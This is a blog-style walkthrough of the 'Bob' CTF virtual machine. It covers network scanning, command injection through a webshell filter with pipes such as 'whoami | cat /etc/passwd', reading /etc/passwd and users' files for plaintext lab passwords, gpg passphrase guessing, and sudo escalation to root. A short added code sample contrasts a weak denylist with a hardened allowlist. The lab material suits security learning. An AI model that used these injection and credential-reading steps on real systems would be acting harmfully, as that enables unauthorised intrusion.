Thursday, September 12, 2019

CTF Machine - Bob

Machine : http://c0rruptedb1t.com/vms/Bob.ova
Duration : 3 x 60 Minutes (approximately)

Meet Bob ...

1. Preparation :

Check my own IP.


Discover the neighbours' IPs.

fping -a -g 10.0.2.0/24

netdiscover -r 10.0.2.0/24



2. Enumeration :

nmap -sS -nvv -A -p22-10000 10.0.2.14

We got some interesting information: /dev_shell.php & /passwords.html. Let's dig deeper with dirb.
dirb http://10.0.2.14

next, curl it

Browse the main page http://10.0.2.14

Let's jump to http://10.0.2.14/dev_shell.php
curl http://10.0.2.14/dev_shell.php
seems like someone already messed with their server :)
shall we start with a basic command check: whoami

Only the basic www-data account anyway, it's ok ... we go deeper, to /etc/passwd
cat /etc/passwd

Nope ... but wait, what if we use a pipe to run a second command after the first one? Let's try it ...
whoami | cat /etc/passwd

yess, it's bliss .... we can identify some users from the passwd file:
 
c0rruptedb1t : c0rruptedb1t
Bob : bob
James C : jc
Sebastian W : seb
Elliot A : elliot
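
Why the pipe got through, as an added example that is not part of the original walkthrough: the source of dev_shell.php is not shown on this page, so `naive_filter_allows` is a hypothetical first-word denylist that merely reproduces the behaviour seen above, and `hardened_argv` is one way a defender could replace it. All names and the allowlist entries are assumptions made for illustration.

```python
# Added illustration: dev_shell.php's real source is not shown on this page.
# DENIED_FIRST_WORDS is a constructed denylist that reproduces what was seen.
DENIED_FIRST_WORDS = {"cat", "ls"}

def naive_filter_allows(cmd: str) -> bool:
    """Weak check: inspect only the first word, then hand the string to a shell."""
    words = cmd.split()
    return bool(words) and words[0] not in DENIED_FIRST_WORDS

# Hardened form: exact-match allowlist mapped to fixed argv, executed without a shell.
ALLOWED = {
    "whoami": ["/usr/bin/whoami"],
    "uptime": ["/usr/bin/uptime"],
}
SHELL_META = set("|&;<>$`\\\n\r(){}[]*?~!#'\"")

def hardened_argv(cmd: str):
    """Return the argv to pass to subprocess.run(argv, shell=False), or None."""
    if any(ch in SHELL_META for ch in cmd):
        return None                      # refuse anything a shell would interpret
    words = cmd.split()
    if len(words) != 1 or words[0] not in ALLOWED:
        return None                      # unknown command or extra arguments
    return list(ALLOWED[words[0]])

# Constructed sample inputs, taken from the commands typed in this walkthrough.
SAMPLES = [
    "whoami",
    "cat /etc/passwd",
    "whoami | cat /etc/passwd",
    "whoami | ls ../../../home/",
]

def compare(cmds):
    """For each command: (command, passes naive filter, passes hardened check)."""
    return [(c, naive_filter_allows(c), hardened_argv(c) is not None) for c in cmds]

if __name__ == "__main__":
    for cmd, naive, hard in compare(SAMPLES):
        print(f"{cmd!r:32} naive={'allow' if naive else 'block':5} "
              f"hardened={'allow' if hard else 'block'}")
```

The denylist judges the string while the shell executes a pipeline, so the two disagree about what the "command" is; the allowlist removes the shell from the path entirely.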

let's check the home directory :

whoami | ls ../../../home/

confirmed, it's bob & friends ... now we check every one of their directories, perhaps we can find some gems there. We start from bottom to top, elliot goes first ...
found a fishy file: theadminisdumb.txt, let's cat it ...
so far we have the following credential information:
james : jc:Qwerty
elliot : elliot:theadminisdumb

yiihaa ... we might have found some low level access, let's try it ...
the ssh connection is denied. Back to the previous nmap result: we did not find any ssh service, so it seems the ssh service is not active, or they might have changed the ssh port.
sshd is active, but why are we unable to connect? Let's check the sshd_config
ok, no wonder we can't connect ... the default port was changed from 22 to 25468
retrying ssh ...
we got a low level shell, it's good enough .... shall we leave the webshell?

3. Escalation :

Let's see what we have here ...
can we get root privileges with sudo?
... nope ... sorry ... let's wander around the home directory ... isn't Bob the sysadmin?
perhaps he has something that we are looking for ...
got some interesting files, also a gpg'ed file ... we'll check it later.
let's go deeper ...
found a bash script : notes.sh , try to run it ./notes.sh
meaningless ... fallback to previous file
vi /home/bob/Documents/staff.txt
something is burning ...
trying to find root executables ...
find / -user root -perm -4000 -print 2>/dev/null
... nope ... no find, no vi, no cat to use .... to perform escalation ....
ok ... let's carefully step back to Bob's home dir and look for hidden files
cd /home/bob ; ls -alh
what's inside .old_passwordfile.html ?
more .old_passwordfile.html
oooh ... ok, it's James's and Sebastian's passwords, let's try them ...
valid passwords, but it's just another low level shell, did we miss something?
login.txt.gpg ... we need to open this
back to /home/bob/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here/notes.sh
sh /home/bob/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here/notes.sh
the script contains some promising keywords, let's use them to open the gpg'ed file
first ... copy login.txt.gpg to elliot's home dir
cd /home/elliot/
cp /home/bob/Documents/login.txt.gpg .
then ... let's try to decrypt it ...
gpg -dv login.txt.gpg
trying the possible passphrase combinations:
HarryPotter
harrypotter
Cucumber
cucumber
seasanty
SeaSanty
HARPOCRATES
finally ...
found another credential
bob:b0bcat_
use it ...
escalate it ...
sudo su ; whoami
looking for the flag ...
cd /root/ ; ls -alh
check root's bash history
cat .bash_history
here is the flag ...
let's find flag.txt

find / -name flag.txt -exec cat {} \;

Finish ...

Thank you and Greets ~c0rruptedb1t

